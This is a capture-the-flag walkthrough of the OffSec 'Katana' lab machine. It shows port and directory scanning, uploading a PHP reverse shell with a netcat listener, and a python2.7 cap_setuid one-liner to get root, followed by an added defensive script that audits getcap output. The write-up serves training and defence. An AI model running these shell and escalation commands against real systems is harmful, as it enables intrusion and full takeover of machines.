OffsecPG - Katana

Katana Machine - Walkthrough

1. Reconnaissance

Run Nmap scan to discover open ports and services.

nmap -sC -sV -p- [TARGET_IP]

Notable open ports:

  • FTP (port 21)

  • SSH (port 22)

  • HTTP (port 80)

  • Samba (port 139, 445)

  • LiteSpeed HTTP (port 8088)

  • Nginx HTTP (port 8715)

2. Exploring HTTP Services

Start by browsing port 80, which yields no useful information.

Proceed with directory brute-forcing against the LiteSpeed service on port 8088 using Gobuster.

gobuster dir -k -u http://[TARGET_IP]:8088/ -w /usr/share/wordlists/dirb/common.txt -x html,php

Interesting directories:

  • /upload.html: File upload page.

3. Gaining Foothold

Upload a PHP reverse shell (pentestmonkey's script) through the upload page.

Once uploaded, the page redirects to the Nginx service on port 8715, where the uploaded shell file is served.

Start a netcat listener and trigger the reverse shell.

nc -nlvp 4444

curl http://[TARGET_IP]:8715/katana_shell.php

Once connected, upgrade to a stable shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

First flag: /var/www/local.txt.

4. Privilege Escalation

Check for binaries with file capabilities (a privilege mechanism separate from SUID) using getcap.

/sbin/getcap -r / 2>/dev/null

Found that the Python 2.7 binary has cap_setuid+ep, which lets any user who can run it change its UID to root.

Use the GTFOBins technique for a Python binary with cap_setuid to escalate privileges:

python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

The shell now runs as root. Retrieve the final flag:

cat /root/proof.txt
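The misconfiguration that gives root here is a file capability, and getcap -r / is exactly how a defender finds it before an attacker does. The script below is an added example written for this walkthrough, not code from the original page or from OffSec; it parses getcap output (both the older "path = caps" and newer "path caps" line formats), flags root-equivalent capabilities such as cap_setuid, and rates them critical when they sit on an interpreter like python2.7. The sample getcap output embedded in it is constructed, and the --live flag, the DANGEROUS_CAPS set and the interpreter list are this example's own choices.

```python
"""Audit `getcap -r /` output for capabilities that grant root-equivalent power.

Added example for the Katana walkthrough (not part of the original page).
Run with no arguments to audit the constructed sample below, or with --live
to run the real getcap on the current host.
"""
import re
import subprocess
import sys

# Capabilities that on their own let a process become root or read/write any file.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}

# Interpreters and editors: a dangerous capability on one of these is a root shell
# for every user allowed to execute it (the situation on this box with python2.7).
INTERPRETER_RE = re.compile(r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|node|php[\d.]*|gdb|vim|nano)$")

# Constructed sample in the two formats different libcap versions print.
SAMPLE_GETCAP = """\
/usr/bin/python2.7 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
/usr/sbin/mtr-packet = cap_net_raw+ep
"""

LINE_RE = re.compile(r"^(?P<path>\S+)\s*(?:=\s*)?(?P<caps>.+)$")


def parse_getcap_line(line):
    """Return (path, [capability names]) for one getcap line, or None if unparseable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    caps = []
    for clause in m.group("caps").split():
        names = re.split(r"[+=-]", clause)[0]  # drop the +ep / =ep / -ep flag suffix
        caps.extend(c.lower() for c in names.split(",") if c)
    return m.group("path"), caps


def classify(path, caps):
    """Rate one entry: 'critical' (dangerous cap on an interpreter), 'review', or 'ok'."""
    risky = DANGEROUS_CAPS.intersection(caps)
    if not risky:
        return "ok"
    if INTERPRETER_RE.search(path):
        return "critical"
    return "review"


def audit(getcap_output):
    """Parse getcap output and return [(severity, path, caps)] for every non-ok entry."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        severity = classify(path, caps)
        if severity != "ok":
            findings.append((severity, path, caps))
    # Critical findings first, then by path, so the worst item tops the report.
    findings.sort(key=lambda f: (f[0] != "critical", f[1]))
    return findings


def run_getcap():
    """Run the real getcap as the walkthrough does; returns '' if the tool is absent."""
    try:
        proc = subprocess.run(["getcap", "-r", "/"], capture_output=True,
                              text=True, errors="replace")
        return proc.stdout
    except FileNotFoundError:
        return ""


if __name__ == "__main__":
    output = run_getcap() if "--live" in sys.argv else SAMPLE_GETCAP
    for severity, path, caps in audit(output):
        print(f"[{severity.upper():8}] {path}: {', '.join(caps)}")
    # With the constructed sample, only /usr/bin/python2.7 is reported, as CRITICAL.
```

The remediation for a critical finding is to strip the capability (setcap -r on the binary) and find out who set it, since a capability on an interpreter is almost never intentional; cap_net_raw on ping or mtr-packet is the normal, expected case and is deliberately left out of the report.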

5. Flags

  • User flag: /var/www/local.txt

  • Root flag: /root/proof.txt

